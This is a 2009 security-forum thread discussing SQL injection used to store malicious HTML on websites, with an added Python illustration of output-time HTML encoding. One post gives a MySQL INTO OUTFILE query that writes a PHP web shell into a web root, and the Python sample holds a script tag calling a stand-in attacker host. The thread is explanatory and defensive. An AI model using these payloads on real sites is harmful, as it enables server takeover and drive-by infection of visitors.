Critical Security.NET: New Type Of Sql Injection - Critical Security.NET


New Type Of Sql Injection in USA today

#1 sagemagic

Posted 19 June 2009 - 07:45 AM

I was reading an article about how SQL injection is spreading, and it mentioned a new (possibly?) type of attack. It says:

Quote

"SQL attacks take aim at the database layer of websites. They typically were manual attacks designed to pilfer customer data from merchant websites. But last June someone figured out how to automate the attacks, and use them to plant infections.

"It was a brilliant tactical move. You sit back and wait for someone to visit the site, and soon you infect thousands of PCs," says Ryan Barnett, Breach Security's director of research."

So is it kind of like a cross between XSS and SQL injection? Does anybody know exactly what they're talking about, because they didn't go into details?

article

#2 Kane

Posted 19 June 2009 - 08:07 AM

From how I interpret that quote, what they're talking about is really nothing groundbreaking.

They're saying that, by using SQL Injection, you can inject HTML code into a website and when it gets pulled from the database and echoed to the client, it will execute. Basically allowing you to XSS their website.

The problem with this is, if the website designer has any sense, the XSS filtering will take place when the DB data is echoed out. Not before it's uploaded. So this won't cause any harm at all. If the XSS filtering is done before the user data is saved to the DB, then yes. This could allow for persistent attacks. That's unlikely, though.

Take this forum, for instance. What I'm typing now is going to be saved to the CS database. It's very likely that my text will be filtered/sanitized before being saved. When it gets echoed out (and you can read it) the sanitizing will take place. In this case, finding an SQLi vulnerability would mean no damage (XSS wise) to the site.

There are instances, though, where something similar can be used for such purposes. Not that long ago, I remember some .tw website for virus protection software had an SQL vulnerability. The link looked something similar to www.virusprotection.tw/downloads.php?id=10. An attacker was/would be able to edit the database and point the download link to a file of his choosing. So when a user went to download virus protection software, they could be downloading a virus itself.

I think that covers what you're asking...

On a side note, certain DBMSs allow for file system access depending on the user privileges the DBMS is running under. MySQL, for instance, has the INTO OUTFILE function that can be used to write files to the server.
For instance, SELECT '<?php echo `[removed] /`; ?>' INTO OUTFILE('/var/www/mysite/shell.php')

In a bit of a rush, so hope that helps.

#3 talwoasc

Posted 19 June 2009 - 05:14 PM

Oops... I always sanitize before inputting data into my database (as in my_sql_real_escape) so that the data cannot fiddle with my query by putting quotes in places that they shouldn't be.

#4 Kane

Posted 19 June 2009 - 05:27 PM

Well, yes, SQL queries should be sanitized. I was referring to HTML entities.

<b>this text</b> can be seen by you as unrendered HTML. As, in the source of this page, you'll see &lt;b&gt;this text&lt;/&gt; - That encoding takes place when the data is echoed out. Not upon uploading :>

#5 talwoasc

Posted 19 June 2009 - 10:42 PM

Got ya now :) And yes, I do remove certain bits like pesky JavaScript, as the text is HTML anyway.

#6 digi7al64

Posted 20 June 2009 - 01:26 AM

I didn't read the article, but I assume you are talking about the mass SQL injection attacks against sites that occurred some time ago.

Essentially, the hackers found a SQL injection in various CMSs that allowed them to save an HTML payload into the database that was echoed back to the user on the home page.

This payload contained an exploit initialisation process via JavaScript.

The difference between this and other attacks (besides the sheer number of sites attacked) was that the entire process was automated with target sites found using SERP.
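As an added illustration of Kane's point (encode HTML when the data is echoed out, not when it is saved) and digi7al64's description of a payload stored through SQL injection and echoed on the home page: this is example code written for this thread, not code from any forum member; the table, the inert script URL and the function names are made up. It simulates a CMS whose own form path encodes on input, then shows that a write which bypasses that form (the SQL injection path) lands raw in the row, so only output-time encoding keeps the page inert.

```python
import html
import sqlite3

# Constructed sample page body: an inert script tag standing in for the
# "exploit initialisation" payload the mass SQL injection campaigns stored.
PAYLOAD = '<script src="http://attacker.invalid/init.js"></script>'


def new_site():
    """In-memory CMS table whose 'body' column is echoed on the home page (made up)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)")
    db.execute("INSERT INTO pages VALUES (1, 'Welcome')")
    return db


def submit_via_form(db, page_id, text):
    """The application's own write path: encodes HTML before saving (input-side filtering)."""
    db.execute("UPDATE pages SET body = ? WHERE id = ?", (html.escape(text), page_id))


def write_via_sqli(db, page_id, text):
    """Simulates a write that reached the DB through a SQL injection: the
    form-side encoding above never ran, so the raw payload lands in the row."""
    db.execute("UPDATE pages SET body = ? WHERE id = ?", (text, page_id))


def fetch_body(db, page_id):
    (body,) = db.execute("SELECT body FROM pages WHERE id = ?", (page_id,)).fetchone()
    return body


def render_trusting_db(db, page_id):
    """Echoes the column as-is: relies on every write path having encoded it."""
    return f"<div id='content'>{fetch_body(db, page_id)}</div>"


def render_encoding_on_output(db, page_id):
    """Encodes at output time, so the markup stays inert however it got stored.
    Encode at exactly one place (here) to avoid double-encoding form input."""
    return f"<div id='content'>{html.escape(fetch_body(db, page_id))}</div>"


def has_live_script(rendered):
    """Crude check for the demo: is there an unencoded <script tag in the output?"""
    return "<script" in rendered.lower()
```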

#7 henke37

Posted 21 June 2009 - 06:34 PM

Kane, on Jun 19 2009, 06:27 PM, said:

That encoding takes place when the data is echoed out. Not upon uploading :>


Actually, IPB stores preprocessed posts.